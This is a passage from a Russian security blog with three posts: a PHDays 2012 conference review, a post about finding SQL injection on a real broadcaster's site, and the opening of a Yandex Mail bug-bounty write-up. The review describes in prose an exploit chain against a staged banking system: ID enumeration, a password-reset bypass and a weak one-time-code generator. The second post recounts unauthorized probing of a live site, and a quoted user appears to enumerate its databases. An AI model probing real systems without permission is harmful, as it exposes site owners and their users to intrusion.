<div style="text-align: justify;">
Место было выбрано удачно – центр города, рядом метро.
Помещение хорошее, залы хорошие, экраны… ну вообщем то же хорошие. Звук
отличный. Вообще организация была великолепной. В плане тех. обеспечения и
удобства. Везде есть места где можно
присесть, есть на что посмотреть. Глаза всегда заняты чем-то. Это круто. Общий
стиль выдержан достаточно хорошо, а на самом деле просто отлично 8) Сами
организаторы выглядели измучено, но всегда помогали и не бросали в беде. Это
просто превосходно, поэтому хочу сказать всем тем позитивным ребятам, когда я
доставал их с всякими проблемами – СПАСИБО! <o:p></o:p></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Доклады…</b><o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Треков много, они параллельны и приходилось выбирать куда
идти. Но выбор был не сложным, так как технических и интересных докладов было
не так много 8( Но те что были, были первоклассными 8) Отмечу:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Тревис Гудспид</b> – доклад про использование шумов и внедрения
пакетов на первом уровне! Весело, оригинально и интересно. Докладчик хорошо
доносит тему, я правда слегка упустил идею с организацией шума, но потом мне
объяснили и эту задачу 8)<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Никита Тараканов</b> и <b>Александр Бажанюк</b> – использование <span lang="EN-US">BitBlaze</span><span lang="EN-US"> </span>при
фаззинге. Доклад хороший, технический, а главное очень объективный в плане
возможностей по использованию сабжа. Очень жаль, что лично Саша не приехал по
объективным причинам в Москву, очень хотелось бы пообщаться лично.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Маркус Нимец</b> – тап-джекинг. Да это забавный доклад, а
главное показывает, как обойти такие
вещи как «ограничение на звонки и запуск приложений» за счет багов юзер
интерфейса. Посмотрим, конечно, будут-ли такие такие атаки реализованы злоумышленниками,
но с точки зрения общей модели безопасности Андройда – явный фейл. <o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Александр Матросов</b> и <b>Евгений Родионов</b> – очень любопытный
доклад-обзор на тему атак интерфейсов смарт-карт реальными вредоносами. Считаю
что именно такими и должны быть доклады антивирусников. К примеру, все три
доклада от Касперских – унылы с точки зрения техники и были общими и
пугательными. Хотя я уверен, что они могли бы и что-то адовое рассказать, но
видимо ЦА была другая… да, да - для «пиджаков»
и таких докладов для детей или пиджаков было много 8(<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Андрей Костин</b> – знаменитый хакер, который ломает то, что
любой пен-тсетер часто игнорирует при
работах – принтеры. Реально интересный и зрелищный доклад.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Владимир Воронцов</b> – про <span lang="EN-US">XXE</span><span lang="EN-US"> </span>атаки и о том, как прочитать валидный
<span lang="EN-US">XML</span><span lang="EN-US"> </span>документ.
Хорошо рассказано, даже 0дэей показал 8) а главная ценность доклада –
практическая применимость в реальной жизни. Например при тех-же пен-тестах.
Люблю такие доклады и поэтому, несмотря на
то. что он был в 9 утра второго дня, мы, с болью в голове и не
выспавшиеся пришли на него… и мест в зале не было 8) Это круто!<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Кстати, потом Володя сделал «доклад инжешн атаку» атаку и на
секции фасттрек незапланированно рассказал про особенность нового РФЦ, а именно
про то, что теперь согласно новой религии стандарта, все под домены могут
читать куки домена более высокого уровня. Я бы даже назвал этот доклад «<span lang="EN-US">breaking</span><span lang="EN-US"> </span><span lang="EN-US">news</span>» 8)<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;">Кроме того, доклад <b>Владимира Кочеткова</b> был техничным и хорошим, и реально интересным. Так же были и другие интересные доклады от<b> Сергея Щербеля</b>, <b>Мирослава Штампара</b>, <b>Дмитрия Склярова</b> и <b>Андрея Беленко</b>, <b>Федора Ярочкина</b> и <b>Владимира Кропотова</b>, <b>Александра Лямина</b> (кстати, Александр потом рассказывал, что есть более интересная тема, про вынос </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">nginx</span><span style="font-family: "times new roman" , serif; font-size: 12pt;"> и предложил нам его на </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">Zeronights</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">. Я попросил рассказать детали, но Александр молодец - не сдал 0дэя и рассказал мне только про </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">slowloris</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">-подобие, но надеемся, что на </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">ZN</span><span style="font-family: "times new roman" , serif; font-size: 12pt;"> этот доклад все же состоится).<o:p></o:p></span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPokt-5JTJbLN4nyV-1-CMaXzd8DQ0PsS2NB5BFQQYktO28bDEaNq0NH6WG-hAUUepOgJrAnfXJabVGeHYZPGsv1CtwqVXzEXVCq3yWgMWhsVSHYQd94T7cem5jfMxnvgnQ9dce1AAEGut/s1600/PHD_RANDOM.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPokt-5JTJbLN4nyV-1-CMaXzd8DQ0PsS2NB5BFQQYktO28bDEaNq0NH6WG-hAUUepOgJrAnfXJabVGeHYZPGsv1CtwqVXzEXVCq3yWgMWhsVSHYQd94T7cem5jfMxnvgnQ9dce1AAEGut/s640/PHD_RANDOM.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">Дмитрий Скляров показывает как некоторые девелоперы выбирают алгоритм для генерации случайных чисел 8)</i></pre>
<div style="background: white; text-align: left;">
<span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">А как же Шнаер? Нет, про его доклад ничего плохого сказать не могу. А вот хорошее скажу – складно говорит, интересно слушать. Вообще сложилось впечатление, что больше всего люди хотели просто сфотографироваться с ним 8)</span><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">А как же </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">Solar</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">Designer</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">? Доклад может и «исторический», но человек он интересный и очень умный, жаль пообщаться не удалось особо.<br /><o:p></o:p></span><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">К сожалению фасттрек был не в зале, а прямо в проходе. Так что тем, кто говорил тихо и скромно - было тяжело. Вообще фасттрек прошел как то скучно. Надеюсь я там не очень нес чепуху –чувствовал себя не очень (ветер, алкоголь, недосып… ну типа я оправдываюсь).</span><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></div>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"><b>Мастер классы…</b><o:p></o:p></span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div style="background: white; text-align: left;">
<span style="font-family: "times new roman" , serif; font-size: 12pt;">Говорят, что были унылы и для «нубов». Я был только на одном – про </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">HTML</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">5. Да, он общий конечно, но вот не унылый. Все подготовлено на хорошем уровне – тесты, задачи. Демонстрации. Все красиво и эффективно для обучения. Так что спасибо <b>Андресу Рьянчо</b> (</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">@w3af</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">). Отличная работа!<br /> </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">Ну теперь пару неприятных моментов – остальные доклады были уж больно «пиджачные» или унылые. Так хакеры Москву не взламывают ).Это лично мое мнение. Возможно, я зануда и придираюсь. Простите меня за это. Так же – во второй день народу пришло явно меньше чем в первый.<br /> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">Про халяву, еду, пиво и односолодовый виски вы прочитаете в других врайт-апах, а я дальше расскажу про конкурсы.</span><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBRMiWpIyFTLrU9oTqf8Y0TOuRmNcqFQtaspSKNhEtSEEvCUnRIah5f39JPcXKylXI87NBOSRXONM_TBbTAP4P6MliOlJHBk-0M-kexIzkvw1zBi1ZsEIl9sFlDw6bR6hrhx0sdGqEFoBq/s1600/PHD_BOAT.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBRMiWpIyFTLrU9oTqf8Y0TOuRmNcqFQtaspSKNhEtSEEvCUnRIah5f39JPcXKylXI87NBOSRXONM_TBbTAP4P6MliOlJHBk-0M-kexIzkvw1zBi1ZsEIl9sFlDw6bR6hrhx0sdGqEFoBq/s640/PHD_BOAT.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">Федор Ярочкин, Александр Поляков и я – встретились на лодке. Прямо как в Амстердаме в 2010, тогда мы так же катались на лодке… (ностальгия)</i></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"><b>Конкурсы.</b><o:p></o:p></span></pre>
<div style="text-align: justify;">
<span style="background-color: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">Одной из особенностью </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">PHDays</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">это его </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">CTF</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">. Я не участник этого праздника хака, но могу сказать, что редко где такое внимание и любовь дается участникам </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">CTF</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">. Конечно заставлять играть два дня подряд и всю ночь может и безжалостно, но это для тру-хакеров - стойких нервами и обладающих выносливостью и усидчивостью. Короче не для меня 8) Но я очень рад. Что победила там наша команда из </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">LeetMore</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">. Во-первых. Это команда из Питера, во-вторых там играет мой коллега по работе - @</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">al</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">3</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">xmin</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">, в-третьих там много классных и умных ребят. И не удивительно, ведь Книга Дракона для них классическое чтиво. А вот я её не читал и воспринимаю этот пробел как свой личный недостаток как специалиста 8) (</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"><i>todo</i></span><span style="font-family: "times new roman" , serif; font-size: 12pt;"><i>: купить и прочитать</i>).<br /><o:p></o:p></span><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">Кроме </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">CTF</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">было и много других конкурсов, но я выделю один. Где мы приняли участие. Вернее я отказался участвовать сославшись на то, что я приехал сюда общаться, а не сидеть перед ноутом (который я так же не взял) но вот мои коллеги Дима @_</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">chipik</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">и Глеб @cherboff приняли этот челлендж. Конкурс – «Большой Ку$». За день до экшена, зарегистрированые участники получали образ ОС с развернутой системой ДБО и тестовой БД. Кроме того, понятно дело, давались исходники этой самой ДБО. После того, как ты сутки искал баги, на второй день проходит конкурс: всем участникам дается свой логин и пароль к ДБО и карточка (реальная!), которая привязана к вашему счету. Дается около 30 минут. За это время участники должны захакать уже боевую инсталляцию ДБО, задача – перечислить деньги с других счетов на свой собственный, после чего с помощью выданной карточки снять ЖИВЫЕ деньги с банкомата, который был так же настоящим и стоял себе в сторонке и ждал победителей. Я так понимаю, организаторы замутили свой псевдо-процессинг, привязали его к СУБД ДБО и к банкомату. Очень классное решение и очень живой конкурс. Ведь бабло можно тырить не только с подготовленных аккаунтов, но и у других участников. Состояние счетов было выведено на экран и все 30 минут можно было видеть, как идет процесс и кто более крутой ворюга 8) Очень живой конкурс и тот кто его придумал – гений. Сами уязвимости были не тупо-вебскими, но и логическими. Наш сплойт перебирал ИД пользователей ДБО, сбрасывал им пароль через соответствующую багу (пропуск одного шага), заходил к ним в аккаунт получал баланс и все бабло переводил на наш счет. Для этого надо было обойти одноразовый пароль, что так же было сделано за счет алгоритма слабой генерации этого-самого кода. Для автоматизации всего это процесса была найдена бага в капчте, так что в итоге эксплойт все делал сам – полная автоматизация. Оператор только следил 8) Кроме того, был учтен и тот факт, что нас так же могут поиметь, поэтому наш эксплойт не только воровал но и защищал нас – менял пароль и сбрасывал сессию раз в период. В итоге наши ребята получили второе место, обойдя таких именитых хакеров как </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">CYBERPUNK</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">и </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">Raz</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">0</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">r</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">, так что я ими очень горжусь. К сожалению, они не стали заморачиваться над другими багами в этом конкурсе – слабая генерация сессии и обход аутентификации в Хэлпдеске. Эти баги давали информацию об аккаунтах с цифровыми паролями (что в дальнейшим позволило их брутить) и, как следствие, получать доступ к аккаунтам с другим балансом. Если я ошибся, надеюсь, меня поправят... Так что героем конкурса, стал </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">GiftS</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">, которые за эксплойтил эти слабости, занял первое место и <s>украл </s>заработал 3500 руб, а мои друзья - лишь второе место и 900 рублей 8) Все деньги банкомат честно выдал. Третье место досталось </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">Raz</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">0</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">r</span></span><span style="font-family: "times new roman" , serif; font-size: 12pt;"><span style="background-color: white;">. Надеюсь, ребята расскажут, что там было в этом конкурсе еще! Но реально, конкурс удался... я получил массу удовольствий болея за ребят, глядя на хладнокровные лица участников и табло с таблицей баланса!</span><span style="background-color: white;"><o:p></o:p></span></span></div>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihgzBnaiMj_om36ONZqdCHU0DpuXvOlgnSfvnL3VdpZwhOcuiHUOBxftmr23Do-DzckZWS7qplyahRu28cd9w-rZaOVfGR96AC3TG1u_XxTzMLRjoIuzm7m8zcPXceshKnoQLFLy7zgKd6/s1600/PHD_DBO.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihgzBnaiMj_om36ONZqdCHU0DpuXvOlgnSfvnL3VdpZwhOcuiHUOBxftmr23Do-DzckZWS7qplyahRu28cd9w-rZaOVfGR96AC3TG1u_XxTzMLRjoIuzm7m8zcPXceshKnoQLFLy7zgKd6/s640/PHD_DBO.JPG" width="640" /></a></div>
<pre style="background: white;"><i><span style="font-family: "times new roman" , serif; font-size: 12pt;">Участники конкурса «Большой Ку$</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">h</span></i><span style="font-family: "times new roman" , serif; font-size: 12pt;"><i>»</i></span></pre>
<div style="background: white; text-align: left;">
<span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">Ах да, еще я выиграл в конкурсе футболок (в конкурсе </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">script</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">-</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">kiddies</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">):<br /> <o:p></o:p></span><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQA8kUlQXOGUaIj6yU-NhCJpKLreqxIWMbYJX6lfc3ycaqwcbfUOYNkNLZ0RZQalRWiRhY1omndH4O_EMWPxNuXoBA9vxrZqGDpL5Z77B7mVfEZf7ZVEa0iH6CNFksCmltw8TO2k_5vvMH/s1600/PHDAYSXSS.jpg" imageanchor="1" style="background-color: transparent; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQA8kUlQXOGUaIj6yU-NhCJpKLreqxIWMbYJX6lfc3ycaqwcbfUOYNkNLZ0RZQalRWiRhY1omndH4O_EMWPxNuXoBA9vxrZqGDpL5Z77B7mVfEZf7ZVEa0iH6CNFksCmltw8TO2k_5vvMH/s400/PHDAYSXSS.jpg" width="400" /></a></div>
<pre style="background: white; text-align: left;"><span style="font-family: "times new roman" , serif; font-size: medium;">
</span></pre>
<div style="background: white; text-align: left;">
<span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">И конечно конкурс </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">HACK</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">2</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">OWN. Он</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">прошел с двумя пробивами: от Никиты Тараканова было получено повышение привилегий в </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">Windows</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">XP</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">, а второй победитель – Павел Шувалов добился, вроде бы, выполнения кода через </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">SMS</span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;"> </span><span style="font-family: "times new roman" , serif; font-size: 12pt;">в </span><span lang="EN-US" style="font-family: "times new roman" , serif; font-size: 12pt;">iPhone</span><span style="font-family: "times new roman" , serif; font-size: 12pt;">.<o:p></o:p></span></div>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-UR9ksY-VFj-pLOAxEx2VMjVlbxmCjkOROpAfiOToLZE9hHDgG7Cjg8nUJ1Ckja6UZrY7ShblKdNRqke6cMsmv-vht-TDiurb1oWMybdSu8Eos6f_8o-VV2_UGMHfEMGaefocsYVfKA6z/s1600/PHD_0DAY.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-UR9ksY-VFj-pLOAxEx2VMjVlbxmCjkOROpAfiOToLZE9hHDgG7Cjg8nUJ1Ckja6UZrY7ShblKdNRqke6cMsmv-vht-TDiurb1oWMybdSu8Eos6f_8o-VV2_UGMHfEMGaefocsYVfKA6z/s640/PHD_0DAY.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white;"><span style="font-family: "times new roman" , serif; font-size: medium;">Никита Тараканов - двукратный призер 8)</span></i></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: medium;">
</span></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglQ2sn97_qNvpka1weRWmBFmYBlxND9GiZ0NrpCDImXrb4kNrzLha1W-YNJnIuADBp26Cppo4F2cp3VxiqMZqJRT_vO_88Myhr_Qd1VD8eRaPwrVxaSHwFzS5YgXT3fxyGbM04JIUmjXxo/s1600/PHD_TUSA.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="425" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglQ2sn97_qNvpka1weRWmBFmYBlxND9GiZ0NrpCDImXrb4kNrzLha1W-YNJnIuADBp26Cppo4F2cp3VxiqMZqJRT_vO_88Myhr_Qd1VD8eRaPwrVxaSHwFzS5YgXT3fxyGbM04JIUmjXxo/s640/PHD_TUSA.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">Артур Геркис, Андрей Костин, Федор Ярочкин, я, Александр Поляков и Дмитрий Евдокимов.</i></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: 12pt;"> </span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtK2lObeffxVQjkeCRYc3d1BjBbJ5KyXthBnsjIZV9sUf8ohmNvWiFEhT9r93ILmiWr3PRMkrIT-3jAx8zLAB6-gOOUeYRN2bzSFqw9-CzK51ygzGtPJ00DRE7MIoMCYSGN652JnhjQTiS/s1600/PHD_TEAM.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtK2lObeffxVQjkeCRYc3d1BjBbJ5KyXthBnsjIZV9sUf8ohmNvWiFEhT9r93ILmiWr3PRMkrIT-3jAx8zLAB6-gOOUeYRN2bzSFqw9-CzK51ygzGtPJ00DRE7MIoMCYSGN652JnhjQTiS/s640/PHD_TEAM.JPG" width="640" /></a></div>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">Александр Матросов, я, Артур Геркис, Владимир Воронцов (кстати, победитель алко-хак конкурса «Наливайка»), Александр Поляков 8)</i></pre>
<pre style="background: white;"><i style="background-color: white; font-family: 'Times New Roman', serif; font-size: 12pt;">
</i></pre>
<pre style="background: white;"><span style="font-family: "times new roman" , serif; font-size: medium;">//Фото Артура Геркиса и Владимира Кропотова</span></pre>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com7tag:blogger.com,1999:blog-4711612808026791519.post-31118464577841221962012-05-29T20:38:00.002-07:002012-05-29T20:38:28.284-07:00Пресс-релиз в ИБ индустрии как красная тряпка для script-kiddies.<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Пресс-релизы в сфере ИБ тема тонкая. Так пример:<br />
<br />
http://www.securitylab.ru/news/425086.php<br />
<br />
Цели такого дела ясны:<br />
<br />
ВГТРК - "мы защищаем своих пользователей и печемся об их безопасности".<br />
Другие - "мы крутые услуги поставляем и спасаем пользователей ВГТРК".<br />
<br />
Но с другой стороны, я взял и зашел на сайт vgtrk.com и ради фана потратил ровно 2 секунды, чтобы поиграться с параметрами данного ресурса, как любой порядочный скрипт-кидди. Тут же всплыла SQL инъекция. Дальше я даже ничего смотреть не стал (и естественно я ничего не ломал и не похищал, я законопослушный гражданин). Мне, как пользователю, не интересно кто там и что делает, что за какие деньги продает и внедряет. Реально безопасность основного внешнего ресурса ВГТРК - отсутствует. Просто и грязно. И мое внимание привлек именно пресс-релиз, так то я бы туда и не зашел. Другие, кстати, подхватили инициативу:<br />
<br />
"@/*__CENSORED__*/:<br />там что-то страшное %) 40 БД под оракалом, 412 пользователей этих БД..."<br />
<br />
Нет, я понимаю, что всякие ИБ процессы, это вам не кавычку в запрос в ставить - это сложные, дорогостоящие работы, проекты и контракты 8) Я не фанат теорий заговоров и распилов, но это же просто забавно, а главное подсознательно снижает доверие ко всем лицам данного проекта.<br />
<br />
Дополнительный факт: та штука, что была внедрена в ВГТРК, прекрасно находит такие проблемы как SQLi. И это лишь дополнительно вызывает вопросы 8))<br />
<br />
P.S. Пост нужно расценивать не как призыв к хактивизму, а именно как призыв оценить одну из проблем отечественной сферы ИБ...<br />
<br /></div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com4tag:blogger.com,1999:blog-4711612808026791519.post-60029842072936232852012-05-21T06:01:00.001-07:002012-05-21T06:53:45.378-07:00Яндекс.Почта. Предотвращение хакострофы<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">В ноябре прошлого года компания «Яндекс» провела </span><a href="http://habrahabr.ru/company/yandex/blog/131199/" id="bxid_528269" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">конкурс </a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">на тему поиска уязвимостей в своем сервисе. Мне посчастливилось найти там пару дырочек и получить за это второе место. Так как за эти полгода я так и не опубликовал деталей (кроме как на встрече </span><a href="https://defcon-russia.ru/" id="bxid_813562" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Defcon-Russia</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">, но это было в устной форме для узкого круга посетителей), я решил восполнить этот пробел сейчас. Так что тут будет рассказ об одной из дырок, которая была обнаружена в рамках конкурса и оперативно закрыта компанией «Яндекс». Считаю, что конкурс полностью оправдал себя и позволил предотвратить страшные последствия, так что идея явно удачна, одни плюсы. Собственно рассказ будет о банальном отсутствии проверки авторизации в одном из скриптов, что могло привести к частичной компрометации более миллиарда писем лишь на одной ноде…</span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"><br /></span><br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Начало</span><br />
<br />
<br />
<a name='more'></a><br /><br />
<br />
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Когда конкурс был объявлен, мне, как руководителю департамента аудита в Digital Security, не хотелось участвовать в этом (я вообще конкурсов боюсь, да и начальники имеют другие важные дела — приказ там отдать кому или отчет потребовать… </span><img id="bxid_458605" src="http://www.securitylab.ru/bitrix/images/blog/smile/icon_cool.gif" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;" title="Здорово" /><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">), но, как всегда, любопытство и жажда наживы продиктовали свои условия. Я решил поискать что-нибудь интересное и веселое, поэтому решил не тратить времени на поиск таких уязвимостей, как XSS и CSRF. Во-первых, они находятся автоматически при изучении любого скрипта (собственно, пара XSS’ок нашлась сразу). Во-вторых – неинтересно (хотя и опасно, как показал</span><a href="http://habrahabr.ru/users/kyprizel/" id="bxid_378967" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">kyprizel</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> в том же </span><a href="http://www.youtube.com/watch?v=E0anE1R_OJI" id="bxid_800456" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">конкурсе</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">). Кроме того, так как зона конкурса (scope) была гигантской, я решил ограничиться только самым интересным для меня сервисом – почтой. При этом решил не тратить более одного рабочего дня, чтобы не отвлекаться от работы. Это позволяло мне не беспокоиться, что я ничего не найду, ведь времени нет (самооправдание, ага!), и искать что-нибудь действительно угарное. В любом случае, для начала надо было просто изучить структуру и логику работы веб-интерфейса. Делалось это банально – с помощью </span><a href="http://portswigger.net/burp/" id="bxid_897322" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">BurpSuite</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> и встроенного в Google Chrome интерфейса разработчика. </span><br />
<br />
